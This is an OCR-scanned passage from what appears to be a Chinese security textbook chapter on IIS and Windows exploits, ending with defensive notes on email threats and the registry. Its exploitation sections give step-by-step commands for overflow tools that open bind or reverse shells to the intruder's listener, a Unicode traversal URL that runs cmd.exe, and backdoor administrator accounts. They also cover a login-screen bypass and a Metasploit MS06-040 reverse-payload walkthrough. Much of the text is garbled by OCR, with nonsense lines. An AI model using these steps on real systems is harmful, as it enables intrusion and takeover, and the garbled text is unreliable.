命令 格式 : iisx < targethost > < sp > <=-pl-al-r attackhost attackport > 

参数 说 明 : 

sp:0 一 一 没有 补丁 。 

-] 一 一 安装 了 补丁 包 spl。 

-p 一 一 如 果 执 行 “iisx 1.1.1.1 0 -p” 命 令 ， 那 么 当 漏洞 成 功 溢出 后 ， 会 在 1.1.1.1 上 打 
开 7788 端口 等 待 连接 ， 入 侵 者 便 可 以 使 用 telnet 1.1.1.1 7788 或 使 用 nc 1.1.1.1 7788 来 登 
录 远 程 服务 器 。 

-a 一 一 如 果 执 行 “iisx 1.1.1.1 -a”， 那 么 当 漏 洞 成 功 溢出 后 ， 会 在 1.1.1.1 上 添加 一 个 管 
理 员 账号 , 账号 名 为 hax ， 密 码 也 为 hax ， 然 后 入 侵 者 就 可 以 使 用 命令 net use \ 1.1.1.1\ipc$ 
“hax”/ user:“hax” 登 录 远 程 服务 器 ， 或 使 用 功能 更 加 强大 的 DameWare 实现 远程 控制 。 

工 一 一 反 向 连接 (类 似 于 ji 的 方式 )， 能 够 穿 透 部 分 设置 的 防火 墙 。 入侵 者 首先 在 本 地 
使 用 nc。 打开 监听 端口 如 250 端口 ， 然 后 使 用 命令 “iisx 1.1.1.1 工 2.2.2.2 250” 对 远程 服务 
器 进行 溢出 ， 如 果 溢出 成 功 就 会 在 监听 窗口 上 获得 远程 服务 器 的 命令 窗口 (Shell)。 

比如 ， 如果 入 侵 者 想 在 远程 服务 器 上 建立 后 门 账号 , 那么 可 以 在 MS-DOS 中 输入 命令 
“iisx 210 . 口 . 口 . 95 0 -a”。 这 样 就 会 在 远程 服务 器 的 漏洞 成 功 溢出 后 自动 建立 一 个 名 
为 “hax”， 密 码 也 为 “hax” 的 管理 员 账 号 。 
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如 果 入 侵 者 想 远程 连接 服务 器 ， 那 么 可 以 在 MS-DOS 中 键入 命令 “iisx 210.*.*.95 0 
-p” 对 远程 服务 器 进行 漏洞 溢出 。 这 样 一 来 , 在 漏洞 成 功 溢出 后 , 远程 服务 器 便 会 开放 7788 
端口 等 竺 入侵 者 连接 。 

此 外 ,入 侵 者 还 可 以 使 远程 服务 器 在 溢出 后 主动 与 自己 连接 。 首先, 通过 命令 “nc -1 -p 
250” 在 本 机 打开 250 号 端口 进行 监听 。 

然后 使 用 “iisx 210. 口 . 口 .95 0-210.30. 口 . 口 250” 命 令 进行 漏洞 溢出 ， 其 中 “210.30. 
口 . 口 ” 是 入 侵 者 本 地 人 P 地 址 ，“250” 是 使 用 nc 在 本 地 打开 的 监听 端口 。 和 前 面 介绍 过 
的 结果 相同 ， 如 果 溢出 成 功 后 ， 便 会 在 本 地 nc 监听 窗口 中 得 到 远程 服务 器 的 命令 窗口 。 

4) ”安全 解决 方案 

微软 已 经 发 布 了 漏洞 补丁 。 

下 载 地 址 : http:/ www.microsoft.com/Downloads/Release.asp?ReleaseID = 29321 

以 上 两 小 节 介绍 了 Unicode 漏洞 和 .asp 映射 分 块 编码 漏洞 。 通 过 对 这 两 个 漏洞 的 介绍 ， 
可 以 了 解 到 ， 入 侵 者 通过 这 两 个 漏洞 并 不 能 直接 获得 远程 服务 器 的 管理 员 权限 。 但 是 ， 入 
侵 者 可 以 通过 其 他 方法 配合 该 漏洞 进行 入 侵 ， 拿 到 管理 员 权限 。 

3. Unicode 目录 遍历 漏洞 

1) “漏洞 描述 

微软 IIS 4.0/5.0 扩展 Unicode 目录 遍历 漏洞 。 

受 影响 的 版 本 : 

Microsoft Windows NT/2000(IIS5.0) 

Microsoft Windows NT4.0(IIS4.0) 

微软 IS4.0 和 IIS5.0 都 存在 利用 扩展 Unicode 字符 取代 “/” 和 “\” 而 能 利用 “../” 
日 录 遍 历 的 漏洞 。 未 经 授权 的 用 户 可 能 利用 IUSR_machinename 账号 的 上 下 文 空间 访问 任 
何 已 知 的 文件 。 该 账号 在 默认 情况 下 属于 Everyone 和 Users 组 的 成 员 , 因此 任何 与 Web 根 
目录 在 同一 逻辑 驱动 器 上 的 ， 并 能 被 这 些 用 户 组 访问 的 文件 都 能 被 删除 、 修 改 或 执行 ， 就 
如 同一 个 用 户 成 功 登 录 后 所 能 完成 的 一 样 。 

2) ”漏洞 利用 

从 漏洞 的 描述 可 以 看 出 ，Unicode 漏洞 允许 未 经 授权 的 用 户 使 用 客户 端正 来 构造 非法 
字符 。 因 此 ， 只 要 入 侵 者 能 够 构造 出 适当 的 字符 如 “/” 和 “\”， 就 可 以 利用 “../” 来 遍历 
与 Web 根 目 录 同 处 在 一 个 逻辑 驱动 器 上 的 目录 ， 从 而 导致 “非法 遍历 ”。 这 样 一 来 ， 入 侵 
者 就 可 以 通过 该 方法 操作 该 服务 器 上 的 磁盘 文件 ， 可 以 新 建 、 执 行 、 下 载 甚 至 删除 磁盘 文 
件 。 除 此 之 外 ， 入 侵 者 可 以 通过 Unicode 编码 找到 并 打开 该 服务 器 上 的 cmd.exe 来 执行 命 
令 。 利用 Unicode 漏洞 入 侵 是 构造 “/” 和 “\” 字 符 让 远程 服务 器 执行 ， 在 Unicode 编码 中 ， 
可 以 通过 下 面 编码 来 构造 “/” 和 “\” 字 符 。 


% cl % 1lc->( Oxcl -Oxco ) * 0x40 + 0x lc = ox5c = !/ 
SeO SS 2FE= s( OXc0 = 0xcD ) * O40 4 Ox2£ = "0x2E = VN 


针对 不 同 语言 的 操作 系统 ， 对 应 的 Unicode 又 有 不 同 。 


3) ”漏洞 检测 

(1) 手工 检测 。 

假设 远程 服务 器 的 操作 系统 为 Windows 2000 pro 中 文 版 , 通过 编码 表 ， 可 以 知道 对 应 
编码 为 “%cl%lc” 或 “%c0%2f”， 这 里 选择 使 用 编码 “%cl%lc”。 然 后 ， 在 正 地 址 栏 中 
输入 “http://192 .168.245.128/scripts / ..%cl % 1c../winnt/system32 / cmd. exe ?/ctdirtC:\”， 
与 远程 服务 器 连接 后 ， 如 果 出 现 C 盘 目录 的 回 显 ， 就 说 明 该 服务 器 存在 Unicode 目录 裔 历 
漏洞 。 

下 面 对 http://192.168.245.128/scripts/..%cl % 1c ../ winnt/system32/cmd.exe?/ ctdirtC:/ 
进行 解释 。 还 需要 说 明 的 是 ， 命 令 问 的 空格 也 可 以 使 用 “+” 代 替 ， 也 就 是 说 “dir + C:\” 
和 “dirC : \” 是 等 价 的 。 

“192.168. 245.128” 为 远程 服务 器 的 瑟 地 址 。 

“scripts” 为 远程 服务 器 上 的 脚本 文件 目录 ,， 除 scripts 外 , 通常 还 有 msadc、_vti __ 
_mem _ bin、cgi-bin 等 脚本 文件 目录 ， 其 中 scripts 目录 是 最 常用 的 。 

“..%cl % 1c..” 是 最 关键 的 一 个 参数 ， 也 就 是 Unicode 漏洞 之 所 在 。 该 参数 被 远程 服 
务 器 译 为 “./”， 因 此 可 以 实现 目录 遍历 。 

“winnt” 是 远程 服务 器 的 系统 目录 ， 也 可 尝试 换 成 “Windows”， 该 参数 根据 远程 服 
务 器 系统 的 不 同 而 不 同 。 

“winnt/system3/cmd.exe ? /c+” 这 一 串 参 数 用 来 打开 远程 服务 器 中 的 cmd.exe, 一 般 不 
用 改变 。 

“dir+C:\” 或 “dirC:\” 是 入 侵 者 要 执行 的 命令 , 也 是 使 用 Unicode 漏洞 的 原因 所 在 。 

(2) 工具 检测 。 

使 用 X-Scan 检测 该 漏洞 。 在 “扫描 模块 ”中 选中 “IIS 漏洞 ”， 开 始 扫描 ， 如 果 扫 描 
到 类 似 “/scripts/..%252f ..% 252f .. % 252f ..%252winnt/system32/cmd.exe?/ctdir”， 就 说 明 
远程 服务 器 存在 该 漏洞 。 

4) “漏洞 利用 

利用 Unicode 漏洞 ， 入 侵 者 能 够 把 正 变 成 远程 执行 命令 的 控制 台 。 不过，Unicode 漏 
洞 并 不 是 远程 溢出 型 漏洞 ， 不 能 像 .ida&.idq 漏洞 那样 直接 溢出 一 个 有 管理 员 权 限 的 Shell。 
在 利用 Unicode 编码 进行 入 侵 的 时 候 , 入 侵 者 只 具有 IUSR_machinename 权限 , 也 就 是 说 ， 
入 侵 者 只 能 进行 简单 的 文件 类 操作 。 虽 然 如 此 ， 入 侵 者 还 是 能 够 利用 Unicode 漏洞 进行 各 
种 操作 。 

5) ”安全 解决 方案 

Unicode 漏洞 补丁 随 微软 安全 公告 MS00-057 一 起 发 布 ， 见 : 

http://www.microsoft.com/technet/security/bulletin/ms00-057.asp 


还 可 以 到 下 面 地址 下 载 补丁 进行 修补 。 
IIS 4.0: 


http://www.microsoft .com/ntserver/nts/downloads/critical/q269862/default .asp 
TE 


http://www.microsoft .com/windows2000/downloads/critical/q269862/default .asp 
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4. .asp 映射 分 块 编码 漏洞 

1) “漏洞 描述 

Windows 2000 和 NT4 IIS.ASP 映射 存在 远程 缓冲 溢出 漏洞 。 
受 影响 系统 : 


Microsoft IIS 4.0 
Microsoft windows NT 4.0 
Microsoft IIS 5.0 


Microsoft windows 2000 


详细 描述 : 
IIS Web 服务 器 是 Microsoft 开发 流行 的 Web 服务 器 。 
其 中 ASP(Active Server Pages)ISAPI 过 滤器 默认 在 所 有 NT4 和 windows2000 系统 中 装 
存在 的 漏洞 可 以 导致 远程 执行 任意 命令 。 
恶意 攻击 者 可 以 使 用 分 块 编码 (chunk encoding ) 形 式 数据 给 ns 服务 器 ， 当 解码 和 解析 
这 些 数据 的 时 候 可 以 强迫 IIS 把 入 侵 者 提供 的 数据 写 到 内 存 的 任意 位 置 。 

通过 利用 这 个 漏洞 可 以 导致 Windows 2000 系统 产生 缓冲 溢出 并 以 IWAM _computer-name 
用 户 的 权限 执行 任意 代码 ， 而 在 Windows NT4 下 可 以 以 System 的 权限 执行 任意 代码 。 

2) ”漏洞 检测 

打开 X-Scan， 在 “扫描 项 目 ” 中 选中 IS 漏洞 ， 然 后 开始 扫描 ， 如 果 得 到 “可 能 存在 
IIS.asp 映射 分 块 编码 远程 缓冲 区 溢出 漏洞 ”就 说 明和 远程 服务 器 存在 该 漏洞 。 

3) ”漏洞 利用 

使 用 工具 : IIS ASP.DLL OVERFLOW PROGRAM 2.0。 

ASPCode 使 用 方法 : aspcode < server > [ aspfile ] [ webport ] [ winxp ] 或 aspcode < 
server>。 

参数 说 明 : 

<server>: 远程 服务 器 。 

[aspfile] : 远程 服务 器 上 ASP 文件 所 在 路 径 。 

[webport] : 远程 服务 器 Web 服务 端口 。 

[winxp] : Win XP 模式 。 

4) ”安全 解决 方案 

(1) 为 操作 系统 安装 补丁 。 

C) 安装 漏洞 补丁 。 

5. WebDAYV 远程 缓冲 区 溢出 漏洞 

1) “漏洞 描述 

Microsoft Windows 2000 ntdll.dll WebDAV 接口 远程 缓冲 区 溢出 漏洞 。 

受 影响 的 系统 : 

Windows 2000(spo-sp3)。 

详细 描述 : 


载 


MEEED SE 


由 于 Microsoft IIS 5.0 包含 的 WebDAYV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数据 ， 
远程 入 侵 者 则 可 以 通过 向 WebDAV 提交 一 个 精心 构造 的 超 长 数据 请 求 而 导致 发 生 缓冲 
溢出 ， 这 可 能 使 入 侵 者 以 Localsystem 的 权限 在 主机 上 执行 任意 指令 。 

2) “漏洞 检测 

可 以 通过 工具 “WebDAVScan” 进 行 检测 ，“WebDAVScan” 是 红 盟 编写 的 专门 用 于 
检测 IS 5.0 中 WebDAV 漏洞 的 专用 扫描 器 ， 可 以 填 上 IP 范围 进行 大 面积 扫描 ， 并 可 以 
返回 远程 服务 器 的 Web 服务 器 版 本 。 使 用 方法 如 下 : 首先 在 “StartIP” 和 “EndIP ”中 填 
入 起 始 卫 和 终止 一 ， 然 后 开始 扫描 。Enable 为 可 用 服务 器 ， 也 就 是 存在 WebDAV 漏洞 
的 服务 器 ，Disable 为 不 存在 WebDAV 漏洞 的 服务 器 。 

3) ”漏洞 利用 

对 于 WebDAYV 漏洞 , 不 同 的 IIS 版 本 使 用 不 同 的 利用 方法 ,下面 分 别 介绍 一 些 漏洞 溢 

(1) wd0.3-en.exe: 英文 版 IS 溢出 工具 ,需要 与 nc 配合 使 用 ， 能够 突破 一 定 设置 的 防 
火 墙 。 

使 用 方法 : 首先 ， 使 用 nc 在 本 地 打开 一 个 监听 端口 。 命 令 为 : nc-VV -1 -p 250。 然 后 
把 该 窗口 放置 一 旁 不 管 ， 再 打开 wd0.3-en.exe, 在 其 中 输入 远程 服务 器 全、 本 机 IP 和 端口 。 
最 后 单 击 “开始 ”按钮 进行 漏洞 溢出 。 等 待 一 段 时 间 ， 如 果 WebDAYV 漏洞 溢出 成 功 ， 远 
程 服务 器 便 会 与 本 地 的 监听 端口 主动 连接 ， 从 而 与 远程 服务 器 建立 连接 ， 连 接 后 就 可 以 执 
行 任何 命令 。 

(2) BIG5.exe: 繁体 版 ITS 溢出 工具 。 

使 用 方法 :big5.exe 目标 人 P。 

代码 的 原型 是 isno 的 webdav3.pl。 

exploit 的 原型 由 Nanika 提供 。 

本 次 修改 将 lock 替换 成 了 PROPFIND, 这 样 会 减少 远程 服务 器 IIS 崩溃 的 可 能 , 修改 
了 溢出 代码 ， 对 于 默认 设置 SP3 版 本 的 主机 基本 上 可 以 做 到 一 次 成 功 ,将 反馈 信息 都 改 为 
中 文 的 。 

(3) Webdavx3: 中 文 版 IIS 溢出 工具 ， 溢 出 成 功 后 直接 打开 7788 端口 等 待 连接 。 

使 用 方法 : Webdavx3 二 目标 卫 > 

(4) WebDAV: 突破 防火 墙 的 WebDAv 溢出 。 

使 用 方法 : webdav.exe 二 目标 了 P> 志 端 口 > 志 偏 移 量 > 

去 端口 >: 目标 服务 器 提供 Web 服务 的 端口 ， 默 认为 80。 

去 偏 移 量 >: 一 般 0、8、9 成 功 几率 最 高 。 

成 功 标志 : 一 旦 出 现 类 似 “C:\INETPUBWWWWROOTINNNNN OK !” 的 提示 ， 回 车 后 
就 会 自动 进入 C :WINNT\ISYSTEM32 > ,而且 防火 墙 也 是 没 用 的 。 如 果 出 现 类 似 ASP 代 
码 这 样 的 东西 ， 直 接 用 组 合 键 “CtrlH+C” 终 止 ， 换 个 偏 移 量 试 试 。 此 外 ， 此 程序 只 对 中 文 
版 本 的 Windows 2000 有 效 。 

4) ”安全 解决 方案 


区 | 


Microsoft Windows 2000 Professional SP3 : 


Microsoft Patch Q815021, 下载 地 址 : 
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http://www.microsoft.com/downloads/details.aspx? 
FamilyId=C9A38D45-5145-4844-B62E C69D32AC929B&gdisplaylang=en 
All versions of Windows 2000 except Japanese NEC . 
Microsoft Patch Q815021, 下 载 地 址 : 
http://www.microsoft.com/downloads/details.aspx? 


FamilyId=FBCF9847-D3D6-4493-8DCF-9BA2963C49F&displaylang=ja 


6. Microsoft |IS6.0 Web 安全 漏洞 


Microsoft IIS6.0 的 Web 管理 接口 存在 多 个 问题 , 远程 攻击 者 可 以 利用 这 个 漏洞 进行 跨 
站 脚本 攻击 ， 获 得 合法 会 话 ID 或 未 授权 访问 部 分 资源 。 

安全 解决 方案 如 下 所 示 。 

如 果 为 IS 服务 器 安装 了 补丁 ， 那 么 网 站 暂时 是 安全 的 ， 因 为 不 一 定 什么 时 候 微软 的 
IS 又 有 新 的 安全 漏洞 被 发 现 。 为 了 尽 可 能 地 减 小 被 新 漏洞 入 侵 的 可 能 ， 现 提出 以 下 几 条 建 
议 来 保护 IIS 服务 器 : 

(1) 转移 根 目 录 ， 不 要 把 Web 根 目 录 建 在 系统 磁盘 (C:\)。 

(2) 把 IS 目录 的 权限 设置 为 只 读 。 

(3) 如 果 IIS 只 用 来 提供 静态 网 页 ， 即 不 提供 ASP、JSP、CGI 等 脚本 服务 ， 那 么 建议 
删除 脚本 目录 ， 或 者 说 删除 全 部 默认 安装 目录 ， 并 禁止 任何 脚本 、 应 用 程序 执行 ， 并 删除 
应 用 程序 配置 里 面 的 “ISAPI” 应 用 程序 、 禁 止 脚本 测试 等 。 

(4) 设置 安全 日 志 ， 并 把 该 日 志 存 在 一 个 不 显眼 的 路 径 下 。 

(5) 安装 网 络 防火 墙 ， 并 禁用 除 80 端口 以 外 所 有 端口 的 内 外 通信 连接 。 

(6) 经 常备 份 ， 并 把 备份 文件 存储 在 另 一 台 计 算 机 上 。 

7. Windows 经 典 漏洞 

1) ”中 文 输入 法 漏洞 

如 果 对 方 开放 了 3389， 则 可 以 通过 其 帮助 文件 进入 系统 而 绕 过 验证 。 

首先 扫描 3389 端口 ，SFind 工具 ， 格 式 : sfind -p 3389 192.168.254.2 192.168.254.254， 
-P 是 指定 扫描 端口 ， 前 一 个 是 开始 地 址 ， 后 一 个 是 终止 地 址 。 

然后 使 用 工具 mstsc 连接 ， 到 用 户 名 ， 密 码 ， 验 证 的 步骤 ， 再 切换 至 中 文 输入 法 ， 再 
右 击 指南 的 左上 角 图 标 ， 一 跳 至 URL， 输 入 ci\winnt\system32， 找 到 net.exe。 

创建 一 个 快捷 方式 , 一 属性 , 然后 在 目标 一 栏 中 输入 :\net.exe user aaa 123 /add, 添加 账 
户 ， 确 定 ， 右 击 一 打开 ， 执行， 同样 可 以 输入 \net.exe localgroup administrator aaa /add 添加 
至 管理 员 组 ， 确 定 一 打开 ， 然 后 使 用 刚才 的 用 户 登录 。 

2) ”RPC 漏洞 

使 用 X-Scan 扫描 ， 可 以 下 载 DComRPC.xpn 插件 放 入 X-Scan 的 plugin 目录 中 ， 重 新 
打开 X-Scan， 可 以 扫描 RPC。 

使 用 Retina(R)-DCOM Scanner 扫描 专用 的 RPC 漏洞 。 

使 用 命令 行 下 的 工具 rpc_ locator 格式 : rpc_locator< 开 始 IP>< 技 术 IP>。 

使 用 工具 : Rpcdcom 和 OpenRpcss。Rpcdcom 格式 为 Rpcdcom Server; OpenRpcss 格 
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式 为 OpenRpcss \\Server。 

先 使 用 Rpcdcom 发 送 数据 ， 如 Rpcdcom 192.168.254.128， 再 用 OpenRpcss 建立 账号 : 
OpenRpcss\192.168.254.128, 或 者 OpenRpcss.exe\192.168.254.128 用 户 名 在 屏幕 下 有 提示 ， 
dcom 有 两 种 方式 连接 : 主动 和 被 动 连接 。 

方法 : docm -d <host>[options]。 

参数 意义 如 下 。 

d: 远程 主机 卫 ( 必 用 参数 ) 

t: 系统 类 型 (0 是 Windows 2000，1 是 Windows XP) 

I: 返回 地 址 
p: 攻击 远程 主机 端口 
1: Z Bindshell 端口 (默认 666) 

h: 反弹 连接 他 

p: 反弹 连接 端口 

方式 1: 入 侵 者 连接 目标 ，dcom-d 192.168.254.128 等 价 于 dcom -d 192.168.254.128 -t0 
P 135 -1 666， 之 后 就 可 疑 telnet 192.168.254.128 666，nc 或 者 cmd。 

方式 2: 远程 主机 主动 连接 入 侵 者 ， 先 用 nc 打开 本 地 端口 监听 : nc -1-p 250。 

再 用 dcom, dcom -d 192.168.254.128 -h 192.168.254.129 一 P 230， 溢 出 后 ，nec 的 窗口 会 
显示 进入 了 对 方 的 根 目录 , 一般 用 80 端口 以 减 小 暴露 的 机 会 。254.128 是 对 方 ，254.129 是 
本 机 。 

3) ”RPC 接口 远程 任意 代码 可 执行 漏洞 

利用 工具 : ms06049.exe。 

打开 cmd 切换 到 工具 所 在 目录 ， 执 行 即 可 在 本 机 建立 一 个 管理 员 账号 ， 可 以 提 权 ， 需 
要 把 此 工具 植 入 远程 主机 

4) ”Server 服务 远程 缓冲 区 溢出 漏洞 (MS06-040) 

扫描 : RetinaNetApi.exe。 

利用 : Metasploit( 一 款 集 众多 漏洞 于 一 体 的 软件 包 )。 

安装 完成 后 ,在 程序 目录 中 有 cygwin.bat，msfconsole .bat，msfupdate .bat，msfweb.bat 4 
个 批 处 理 文件 ， 先 打开 msfupdate .bat 更 新 exp 完毕 后 ， 运 行 msfconsole bat， 输 入 show 
exploits 查看 有 哪些 溢出 程序 。 

输入 use netapi_ms06_040 使 用 MS06-040 溢出 程序 ; 

输入 show payloads 显示 可 用 的 shellcode 列表 ， 如 使 用 : win32_reverse; 

输入 set PAYLOAD win32_reverse, 设 置 PAYLOAD 为 Win32 reverse: 

输入 set RHOST 211.234.*.* 来 设置 要 攻击 的 主机 IP 指 (Remote Host); 

输入 set LHOST 121.*.*.* 设 置 本 机 IP 指 (Local Hosb; 

输入 set TARGET 0 设置 溢出 类 型 ; 

输入 set 检查 输入 的 信息 ; 

输入 exploit 开始 溢出 , 成 功 后 可 以 通过 445 端口 发 送 shellcode 获得 一 个 具有 管理 员 权 
限 的 交互 式 shell。 

解决 方案 : 安装 补丁 ， 关 闭 139，445， 使 用 防火 墙 ， 启 用 高 级 TCP/IP 过 滤 ， 用 IPSec 
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阻 断 端口 。 
3.2.2 ”基于 电子 邮件 服务 攻击 的 防护 方法 


电子 邮件 是 当今 世界 上 使 用 最 频繁 的 商务 通信 工具 ， 电 子 邮 件 的 持续 升温 使 之 成 为 那 
些 企图 进行 破坏 的 人 所 日 益 关注 的 目标 。 如 今 ， 黑 客 和 病毒 撰写 者 不 断 开发 新 的 和 有 创意 
性 的 方法 ， 以 期 战胜 安全 系统 中 的 改进 措施 。 

典型 的 Intemet 通信 协议 TCP 和 UDP, 其 开放 性 常常 引 来 黑客 的 攻击 。 而 人 P 地 址 的 脆 
弱 性 ， 也 给 黑客 的 伪造 提供 了 可 能 ， 从 而 泄露 远程 服务 器 的 资源 信息 。 很 多 电子 邮件 网 关 ， 
如 果 电 子 邮件 地 址 不 存在 ， 系 统 则 回复 发 件 人 ， 并 通知 他 们 这 些 电子 邮件 无 效 。 黑 客 利用 
电子 邮件 系统 的 这 种 内 在 “礼貌 性 ”来 访问 有 效 地 址 ， 并 添加 到 其 合法 地 址 数据 库 中 。 

防火 墙 只 控制 基于 网 络 的 连接 , 通过 标准 电子 邮件 端口 (25 端口 ) 的 通信 进行 详细 审查 。 
一 旦 企业 选择 了 某 一 邮件 服务 器 ， 它 基本 上 就 会 一 直 使 用 该 品牌 ， 因 为 主要 的 服务 器 平台 
< 天 人 人 知 由 测 疯 。 


常见 弱点 。 各 种 IMAP 和 POP 服务 
容易 受到 如 缓冲 区 溢出 等 类 型 的 攻击 。 

(2) 拒绝 服务 (DOS) 攻 击 。 

中 死亡 之 ping 一 一 发 送 一 个 无 效 数据 片段 ， 该 片段 始 于 包 结尾 之 前 ， 但 止 于 包 结 尾 
之 后 。 

© 
资源 ， i 法 连接 。 

发 送 一 个 带 有 完全 相同 的 源 /目的 地 址 /端口 的 伪造 SYN 包 ， 使 系统 陷入 
二 不 诚 国 守 成 城中 过 楼 的 天 也 条 证 中 ，。 

(3) 系统 配置 漏洞 企业 系统 配置 中 的 漏洞 可 以 分 为 以 下 几 类 。 

@ ”默认 配置 一 一 大 多 数 系统 在 交付 给 客户 时 都 设置 了 易于 使 用 的 默认 配置 ， 使 黑客 
盗用 变 得 轻松 。 

@ “ 

多 得 惊人 。 

@ 漏洞 创建 一 一 几乎 所 有 程序 都 可 以 配置 为 在 不 安全 的 模式 下 运行 ， 这 会 在 系统 上 
留 下 不 必要 的 漏洞 。 

(4) 利用 软件 问题 一 一 在 服务 器 守护 程序 、 客 户 端 应 用 程序 、 操 作 系统 和 网 络 堆栈 中 ， 
存在 很 多 的 软件 错误 ， 分 为 以 下 几 类 。 

@ 缓冲 区 溢出 一 一 程序 员 会 留 出 一 定数 目的 字符 空间 来 容纳 登录 用 户 名 ， 黑 客 则 会 
通过 发 送 比 指定 字符 串 长 的 字符 串 ， 其 中 包括 服务 器 要 执行 的 代码 ， 使 之 发 生 数 据 溢出 ， 
造成 系统 入 侵 。 

@ 意外 组 合 一 一 程序 通常 是 用 很 多 层 代码 构造 而 成 的 ， 入 侵 者 可 能 会 经 常 发 送 一 些 
对 于 某 一 层 毫 无 意义 ， 但 经 经 过 适当 构造 后 对 其 他 层 有 意义 的 输入 。 

@ 未 处 理 的 输 员 都 不 考虑 输入 不 符合 规范 的 信息 时 会 发 生 什么 
后 果 。 
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(5) 利用 人 为 因素 一 一 攻击 者 使 用 高 级 手段 使 用 户 打 开 电 子 邮 件 附件 的 例子 ， 包 括 双 
扩展 名 、 密 码 保护 的 Zip 文件 、 文 本 欺骗 等 。 

(6) 特洛伊 木马 及 自我 传播 一 结合 特洛伊 木马 和 传统 病毒 的 混合 攻击 正 日 益 猩 狐 。 
攻击 者 所 使 用 的 特洛伊 木马 的 常见 类 型 有 以 下 几 种 。 


@ 远程 访问 


过 去 ， 特 洛 伊 木 马 只 会 侦 听 对 黑客 可 用 的 端口 上 的 连接 。 而 现在 特 


洛 伊 木马 则 会 通知 黑客 ， 使 黑客 能 够 访问 防火 墙 后 的 机 器 。 有 些 特洛伊 木马 可 以 通过 IRC 
命令 进行 通信 ， 这 表示 从 不 建立 真实 的 TCP/IP 连接 。 


@ 数据 发 送 一 一 将 信息 发 送 给 黑客 。 方 法 包括 记录 按键 、 搜 索 密码 文件 和 其 他 秘密 
信息 。 

加 ”破坏 一 一 破坏 和 删除 文件 。 

@ ”拒绝 服务 一 一 使 远程 黑客 能 够 使 用 多 个 僵尸 计算 机 启动 分 布 式 拒绝 服务 (DDoS) 
攻击 。 

@ ”代理 一 一 指 在 将 受害 者 的 计算 机 变 为 对 黑客 可 用 的 代理 服务 器 。 是 匿名 的 Telnet、 


ICQ 、IRC 等 系统 用 户 可 以 使 用 窃 得 的 信用 卡 购物 , 并 在 黑客 追踪 返回 到 受 感染 的 计算 机 时 
使 黑客 能 够 完全 隐匿 其 名 。 

由 于 企业 日 益 依赖 于 电子 邮件 系统 ， 它 们 必须 解决 电子 邮件 传播 的 攻击 和 易 受 攻击 的 
电子 邮件 这 两 种 攻击 的 问题 。 解 决 方法 有 以 下 3 种 。 

Q@ 在 电子 邮件 系统 周围 锁定 电子 邮件 系统 一 一 电子 邮件 系统 周边 控制 开始 于 电子 邮 
件 网 关 的 部 署 。 电 子 邮 件 网 关 应 根据 特定 目的 与 加 固 的 操作 系统 和 防止 网 关 受 到 威胁 的 入 


侵 检测 功能 - 


-起 构建 。 


@ 确保 外 部 系统 访问 的 安全 性 一 一 电子 邮件 安全 网 关 必 须 负 责 处 理 来 自 所 有 外 部 系 
统 的 通信 ， 并 确保 通过 的 信息 流量 是 合法 的 。 通 过 确保 外 部 访问 的 安全 ， 可 以 防止 入 侵 者 


利用 Web 邮 


@ 实时 监视 电子 邮件 流量 


件 等 应 用 程序 访问 内 部 系统 。 
实时 监视 电子 邮件 流量 对 于 防止 黑客 利用 电子 邮件 访 


问 内 部 系统 是 至 关 重 要 的 。 检 测 电子 邮件 中 的 攻击 和 漏洞 攻击 (如 畸形 MIME) 需 要 持续 监视 


所 有 的 电子 邮件 。 
在 上 述 安全 保障 的 基础 上 ， 电 子 邮 件 安全 网 关 应 简化 管理 员 的 工作 ， 能 够 轻松 集成 并 
被 使 用 者 轻松 配置 。 


3.2.3 ”注册 表 入 侵 的 防护 方法 


从 Windows 95 开始 ，Microsoft 在 Windows 中 引入 了 注册 表 (Registry)， 用 于 代替 原来 


Win32 系统 


Bini 文件 。 注册 表 是 Windows 用 来 管理 配置 系统 运行 参数 的 一 个 核心 数据 库 。 


在 这 个 数据 库 里 整合 集成 了 全 部 系统 和 应 用 程序 的 初始 化 信息 ， 其 中 包含 了 硬件 设备 的 说 
明 、 相 互 关 联 的 应 用 程序 与 文档 文件 、 窗 口 显 示 方 式 、 网 络 连接 参数 ， 甚 至 有 关系 到 计算 
机 安全 的 网 络 共享 设备 。 它 与 原来 Win32 系统 里 的 .ini 文件 相 比 ， 具 有 方便 管理 、 安 全 性 
较 高 、 适 于 网 络 操作 等 特点 。 如 果 注册 表 受 到 了 破坏 ， 轻 者 是 Windows 的 启动 过 程 出 现 异 
常 ， 重 者 可 能 会 导致 整个 Windows 系统 瘫痪 。 用 户 通 过 注册 表 可 以 轻易 地 添加 、 删 除 、 修 
改 系统 内 的 软件 配置 信息 或 硬件 驱动 程序 ， 大 大 方便 了 用 户 对 软件 的 工作 状态 进行 调整 。 
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与 此 同时 ， 入 侵 者 也 经 常 通过 注册 表 来 种 植木 马 、 修 改 软件 信息 ， 甚 至 删除 、 停 用 或 改变 
硬件 的 工作 状态 。 

首先 了 解 一 下 注册 表 的 基本 知识 。 在 “运行 ”对 话 框 中 输入 “regedit”， 然 后 单 击 “ 确 
定 ” 按 钮 ， 就 可 以 运行 注册 表 编 辑 器 。 在 注册 表 中 ， 所 有 的 数据 都 是 通过 一 种 树 状 分 层 结 
构 来 组 织 的 ， 由 子 树 及 项 、 子 项 和 项 值 组 成 ， 十 分 类 似 于 目录 结构 。 通 过 图 3-6、 表 3-1、 
表 3-2 可 以 基本 了 解 它 的 相关 知识 。 


文件 人 E) 编辑 下 ) 查看 QD) 收 戌 天 以) 帮助 0D 


日 电 我 的 电脑 
于 MIET_CUSSES_ ROOT 
子 目 录 数 由 国 IEY_CURRENT_VSER USERNANE 
ab]SystenBootDevice multi (0)disk (0)rdisk (0) 
[eB]SystenStartOptions WOEXECUTE=OPTIN FASTDE| 
注册 表 项 树 村 加 mitTofillServiceTi 1000 


四国 ControlSet001 


和 多 ControlSet003 
子 项 二 二 a currentcontrolse 
> 
活动 子 项 tam 
a ApaLegat 
HB rbiters 
5 回 BeckupRes+ 
a Biosinfo 
a bootyerifi 
3 ss 
- ety 略 活动 子 项 的 项 目 
< > < 


我 的 电脑 \HKEY_LDCAL_MACHINE\SYSTEM\CurrentControlSet\Control 


子 项 


图 3-6 ”注册 表 的 分 层 结构 
表 3-1 注册 表 根 项 名 称 说 明 


跟 项 名 称 说 阴 

包含 关于 本 地 计算 机 系统 的 信息 , 包括 硬件 和 操作 系统 数据 , 如 总 线 类 
型 、 系 统 内存 、 设 备 驱 动 程序 和 启动 控制 数据 

包含 有 各 种 OLE 技术 使 用 的 信息 和 文件 类 别 关 联 数据 。 如 果 
HKEY LOCAL MACHINE(HKEY_ CURRENT USER)SOFTWARE\Classes 
